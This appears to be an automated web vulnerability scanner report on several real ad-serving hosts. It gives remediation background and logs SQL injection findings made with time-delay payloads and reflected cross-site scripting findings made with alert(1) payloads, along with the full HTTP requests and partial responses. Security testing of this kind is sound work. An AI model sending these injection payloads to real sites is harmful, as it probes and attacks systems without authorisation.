SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The siteId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /adx/ZonePlanCounts.ashx?siteId=1245waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: run.admost.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The uid cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the uid cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /adx/get.ashx?z=2012&lang=en&page=videodetay&categoryid=[11][16]&videoid=379705&browser=iexplorer&hq=0 HTTP/1.1
Host: run.admost.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locc={"city":"Dallas","countryCode":"US","regionName":"Texas","countryName":"United States","region":"TX"}; tco=23.04.2011 20:35:20; uid=43BD3B0296C')waitfor%20delay'0%3a0%3a20'--; sid=7242052A842
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edbcb'-alert(1)-'c7bb2b8b2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ronedbcb'-alert(1)-'c7bb2b8b2fd/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Sun, 24 Apr 2011 03:11:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a84e2'-alert(1)-'53e58deb728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audiencea84e2'-alert(1)-'53e58deb728;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Sun, 24 Apr 2011 03:11:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT
2.3. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/iblocal.rubiconmcclatchy.ron/audience
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fc34'-alert(1)-'bff7e746697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?&3fc34'-alert(1)-'bff7e746697=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 474
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:04 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1401'-alert(1)-'d01cba75e60 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?d1401'-alert(1)-'d01cba75e60 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Sun, 24 Apr 2011 03:11:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:03 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ff8f'-alert(1)-'719f38ddf18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7668
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-68133549_1303614666","http://ad.doubleclick.net/adj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-68133549_1303614666,11f8f328940989e,gadg,dx.16;;cmw=owl;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4810'-alert(1)-'0cd03c4b95e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7660
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-85131481_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;net=iblocal;u=,iblocal-85131481_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5783e'-alert(1)-'6610fd28a51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7658
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-7983029_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;net=iblocal;u=,iblocal-7983029_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b84ad'-alert(1)-'66cb81808d3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=b84ad'-alert(1)-'66cb81808d3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Content-Length: 7636
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... tiveMedia.createAndAttachAd("iblocal-17384975_1303614664","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-17384975_1303614664,11f8f328940989e,none,dx.16;;sz=b84ad'-alert(1)-'66cb81808d3;contx=none;dc=w;btg=dx.16?","b84ad'-alert(1)-'66cb81808d3","",true);</scr'+'ipt> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4695"-alert(1)-"14cee7ecabd was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... st4GNetwork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/ ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bc2e"-alert(1)-"753a23f325e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
